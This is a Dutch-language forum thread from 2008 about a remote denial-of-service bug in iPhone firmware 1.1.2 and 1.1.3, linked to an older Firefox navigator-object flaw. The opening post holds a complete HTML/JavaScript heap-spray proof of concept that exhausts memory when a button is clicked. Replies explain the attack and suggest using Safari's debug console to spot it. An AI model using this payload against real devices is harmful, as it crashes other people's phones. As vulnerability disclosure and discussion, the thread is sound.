//

iPhone Dos 1.1.2/1.1.3

iPhone Dos 1.1.2/1.1.3 discussie in iPhone algemeen forum; ( verdwijnt na registratie ) Version affected: 1.1.2 and 1.1.3 Overview: The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. ...



Ga terug   iPhone, iPod touch, iPad en Apple TV forum > iPhone > iPhone algemeen
Wachtwoord vergeten? Registreren!
Registreer FAQ Ledenlijst Kalender Berichten van vandaag

Discussie gesloten

 

Discussietools Weergave
  #1  
Oud 21-02-08, 21:34
DertKesh's schermafbeelding
DertKesh DertKesh is offline
• iOS 14.2
• Ik heb geen iPad
• Besturingssysteem: Windows
 
Geregistreerd: Dec 2007
Locatie: Nederland
Berichten: 636
Standaard iPhone Dos 1.1.2/1.1.3

Version affected: 1.1.2 and 1.1.3

Overview:
The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. After further research it also appears that this was a known issue with Firefox version 1.5.04 and was effected cross-platform.

Called Mozilla Firefox JavaScript navigator Object Vulnerability.
DE TIP IS DUS: -> I recommend you disable Java until Apple releases a fix or patch.

___________________________________

Proof of Concept (PoC):
Code:
<html><body><script>
 
function Demo() {
 
var shellcode;
 
var addr;
 
var fill;
 
alert('attempting a crash!');
 
shellcode = unescape('%u0c0c');
 
fill = unescape('쳌');
 
addr = 0x02020202;
 
var b = fill;
 
while (b.length <= 0x40000) b+=b;
 
var c = new Array();
 
for (var i =0; i<36; i++) {
 
c[i] =
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode;
 
}
 
}
 
</script>
 
<input type='button' onClick='Demo()' value='Go!'>
 
</body></html>
BRON
__________________
Don't tell people your dreams, show them!

Laatst gewijzigd door DertKesh; 22-02-08 om 03:03.
Advertentie
Advertentie Gesponsorde links (verdwijnt na registratie)

  #2  
Oud 21-02-08, 21:54
jeekes jeekes is offline
 
• Besturingssysteem: Windows
 
Geregistreerd: Dec 2007
Locatie: België
Berichten: 522
Standaard

ehm wat is remote dos?
en wat betekenen die tekentjes?
ik ken nx van programmere
ik voel me plotseling zo dom.....
  #3  
Oud 21-02-08, 22:43
iCulture's schermafbeelding
iCulture iCulture is offline
Administrator
• iOS 18.0
• iPadOS 18.0
• Besturingssysteem: macOS
 
Geregistreerd: Sep 2007
Locatie: Amsterdam
Berichten: 24.253
Standaard

Remote DOS is Denial Of Service.
  #4  
Oud 21-02-08, 23:23
Nikooos's schermafbeelding
Nikooos Nikooos is offline
• iOS 10.0.2
• 10.0.2
• Besturingssysteem: Mac OS X
 
Geregistreerd: Nov 2007
Locatie: Tilburg
Berichten: 3.172
Standaard

uhm.. misschien ben ik gek, maar ik weet nog steeds niet wat dit precies inhoud.. Kan je wat meer info geven.

Qua programmeertaal zie ik wel dat er vanalles gebeurd, maar wat gebeurd er precies??
  #5  
Oud 21-02-08, 23:40
jeekes jeekes is offline
 
• Besturingssysteem: Windows
 
Geregistreerd: Dec 2007
Locatie: België
Berichten: 522
Standaard

dus als ik het een beetje begrijp dient dit om je computer binnen te hacken vanaf je iPhone....
juist?
  #6  
Oud 22-02-08, 02:58
DertKesh's schermafbeelding
DertKesh DertKesh is offline
• iOS 14.2
• Ik heb geen iPad
• Besturingssysteem: Windows
 
Geregistreerd: Dec 2007
Locatie: Nederland
Berichten: 636
Standaard

@ Jeekes

Het is juist andersom, dus als jij met je iPhone een site bezoekt die dus met dat is "besmet" dan laat dat site een code achter op je iPhone wat jouw systeem geheugen "opeet"..

Zie deze (Engelse) uitleg hierover:

Citaat:
DoS attack on iPhone causes memory leak, freeze

iPhone owners should be on guard against a new threat, which fortunately doesn't harm the device, but still induces a freeze by taking all available system memory. According to security firm SecurityFocus, the vulnerability is exposed by a Denial of Service attack, when a maliciously crafted webpage is viewed. The page will insert code into the iPhone, which continually eats up available system memory before causing a kernel panic. While not the first attack on the iPhone, SecurityFocus believes it could be harmful to the device's wellbeing by potentially executing remote code.

The DoS exploit has been verified to work on the 1.1.2 iPhone firmware; Apple has not commented on the issue.
hier staat dat het op 1.1.2 voorkomt maar in de topic zelf staat dus dat het ook op 1.1.3 voorkomt.
  #7  
Oud 23-02-08, 14:55
croiman's schermafbeelding
croiman croiman is offline
Psycho iPhone Case Modder
• iOS 5.0.1
• Ik heb geen iPad
• Besturingssysteem: Windows
 
Geregistreerd: Nov 2007
Locatie: Twilight zone with Psycho's
Berichten: 3.370
Stuur een bericht via MSN naar croiman
Standaard

idd, daarom kun je dus debug console in safari aanzetten zodat je kunt zien of je die fout binnen krijgt met safari.
__________________
PM functie overhit. Gelieve alleen serieuze probleem gevallen via PM.
Going from iphone extreme mod to Motorola Photon Q 4G LTE with simcard mod and lots more.
  #8  
Oud 23-02-08, 18:23
jeekes jeekes is offline
 
• Besturingssysteem: Windows
 
Geregistreerd: Dec 2007
Locatie: België
Berichten: 522
Standaard

ah daar had ik al van gehoord, maar niet onder die naam
dank voor de verhelderende uitleg
Discussie gesloten



Er zijn 1 actieve gebruikers die momenteel deze discussie bekijken (0 leden en 1 gasten)

 

Soortgelijke discussies

Discussie Auteur Forum Reacties Laatste bericht
Dos emulator op iphone/ipad in app store! borgqueenx iPad Apps 3 01-11-10 17:51
Blijft lopen in (dos schem) DGCAR Unlock [archief] 2 04-03-08 18:50

Regels voor berichten
Je mag geen nieuwe discussies starten
Je mag niet reageren op berichten
Je mag geen bijlagen versturen
Je mag niet je berichten bewerken

BB code is Aan
Smileys zijn Aan
[IMG]-code is Aan
HTML-code is Uit
Trackbacks are Aan
Pingbacks are Aan
Refbacks are Uit



Alle tijden zijn GMT +2. Het is nu 03:12.